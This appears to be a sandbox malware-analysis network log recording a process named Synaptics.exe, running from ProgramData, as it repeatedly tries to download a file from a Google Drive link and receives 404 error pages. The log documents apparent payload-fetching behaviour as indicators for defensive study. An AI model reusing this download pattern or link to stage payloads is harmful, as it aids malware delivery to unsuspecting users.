                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:25 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-imbXbxSvCR9sHEYP9EzQcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      75192.168.2.549885142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:26 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:26 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-bYtimT9K9kSbTQ04byeknA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      76192.168.2.549884142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:26 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:26 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6NAdVvlnTiwM_L4fBg5PuYVmpGC33E-AAMivc4XE7BldObXMtrIXfBsfc0cGVRWGYkVqqKr7s
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:26 GMT
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-dkRAlg9JvKozKWcv38QnjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:26 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:26 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 44 52 5f 71 42 68 54 51 72 6d 6d 36 52 2d 66 54 42 55 35 48 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="lDR_qBhTQrmm6R-fTBU5HA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:26 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      77192.168.2.549886142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:26 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:26 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-L88ZcP_aP4LOdPWQ1p8Q6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      78192.168.2.549887142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:26 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:27 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC7SMVOMk_A5U6vF4up5ioHeyx-W4FaELMvnUZJvOBdc7LA8y7CSbJUX0QfEr28DuC12
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:26 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ou2H1DRG1L2kuRU1ll2jdQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:27 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:27 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 73 39 51 75 66 69 4c 76 61 34 4d 68 35 32 70 56 59 42 4e 72 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="Fs9QufiLva4Mh52pVYBNrA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:27 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      79192.168.2.549896142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:27 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:27 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-jykTW6Qg-d9O2sXgFQzeag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      80192.168.2.549897142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:27 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:27 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-2sAcPwOFm0XP6evK3gPfAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      81192.168.2.549898142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:27 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:27 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC4OzBk4dpquZlpfSpwAbFy05Zb-MzvoQAbViwLtbQUFVbYzncyVmFCTD8OJQMrWA_bk
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:27 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-UyqLuZKg2-EH53C1rRO9FA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:27 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:27 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 79 76 62 73 63 4e 61 36 41 39 53 61 36 44 6f 77 5a 38 6d 6c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="4yvbscNa6A9Sa6DowZ8mlg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
